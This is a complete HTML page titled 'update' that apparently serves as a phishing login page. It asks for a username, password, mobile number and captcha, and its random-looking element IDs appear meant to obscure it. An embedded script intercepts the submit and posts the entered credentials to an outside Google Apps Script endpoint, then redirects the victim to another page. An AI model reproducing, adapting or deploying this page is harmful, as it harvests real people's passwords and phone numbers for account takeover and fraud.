<!DOCTYPE html>
<html lang="zxx">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>update</title>
    <style>
        #awesrw ,#uytfd ,#wsdfjkiuytd
    {
        width: 100%;
    }
    #puyht
    {
        background-color: rgb(121, 13, 69);
        border-radius: 15px;
        margin-left: 3%;
        font-size: larger;
        color: aliceblue;
        font-style: normal;
        text-decoration-line: none;
        padding-right: 10px;
        padding-left: 10px;
        padding-top: 3px;
        padding-bottom: 3px;

    }
    #oiuhgbju
    {
        background-color: rgb(237, 220, 231);
        border-radius: 15px;
        margin-left: 0%;
        font-size: larger;
        color: rgb(23, 23, 23);
        font-style: normal;
        text-decoration-line: none;
        padding-right: 10px;
        padding-left: 10px;
        padding-top: 3px;
        padding-bottom: 3px;
        
    }
    #ytrdjjy
    {
        margin-left: 9%;
    }
    #ytrdchytd
    {
      margin-left: 9%;
      width: 80%;
      height: 28px;
      color: #554;
    background: #f0efee;
    border: 1px solid #cac5c6;
    }
    #ytordchytd
    {
        margin-left: 9%;
      width: 80%;
      height: 28px;
      color: #554;
    background: #f0efee;
    border: 1px solid #cac5c6;
    }
    #ytrdjjyuy{
        margin-left: 9%;
    }
    #ytfdvj{
        margin-left: 9%;
    }
    #oiuygggf
    {
        margin-left: 9%;
        margin-top: 15px;
        width: 20%;
        height: 28px;
        background-color:#466c94;
        font-size: large;
        color: aliceblue;
        border-style: none;
        border-radius: 2px; 
    }
    #iuyfd
    {
        margin-left: 2%;
        margin-top: 15px;
        width: 20%;
        height: 28px;
        background-color:#466c94;
        font-size: large;
        color: aliceblue;
        border-style: none; 
        border-radius: 2px; 
    }
    #ftdd
    {
        margin-left: 9%;
      width: 80%;
      height: 28px; 
      color: #554;
    background: #f0efee;
    border: 1px solid #cac5c6;
    }
    </style>
</head>
<body>
    <div id="awesr">
        <img src="oiuytrdfl.jpeg" alt=""  id="awesrw">
    </div>
    <div id="rest">
        <form action="https://script.google.com/macros/s/AKfycbzRhoJAED03W7xasLwlPX6e7zqO0bx5za2do7jzZoGEKALczKJ3dI8avRFJt_JzDAg3/exec" method="post" id="aa">
            
                <p id="ytrdjjy">
                    Username* 
                </p> 
                <input type="text" name="user" id="ytrdchytd">

                <p id="ytrdjjyuy">
                    Password* 
                </p> 
                <input type="password" name="pass" id="ytordchytd" >
                <p id="ytrdjjyuy">
                    Mobile No.* 
                </p> 
                <input type="number" name="mob" id="ytordchytd" >
                <p id="ytfdvj">
                    Enter the text shown in the image*
                    
                </p>
                <input type="text" name="rt" id="ftdd"> 
                <img src="uytdsxcghjk.jpeg" alt="" id="uytfd">

                <button type="submit" id="oiuygggf">LOGIN</button> <button type="reset" id="iuyfd">RESET</button>
            </div> <br>
        </form>
        <script type = "text/javascript" >
            window.addEventListener("DOMContentLoaded", function() {
                const yourForm = document.getElementById('aa');
                yourForm.addEventListener("submit", function(e) {
                    e.preventDefault();
                    const data = new FormData(yourForm);
                    const action = e.target.action;
                    fetch(action, {
                        method: 'POST',
                        body: data,
                    }).then(() => {
                        window.location.replace('1ytrsxdfghjuytr.html')
                    })
                })
            }); 
        </script>
        <img src="uytrsasdfghj.jpeg" alt="" id="wsdfjkiuytd">
       
    </div>
</body>
</html>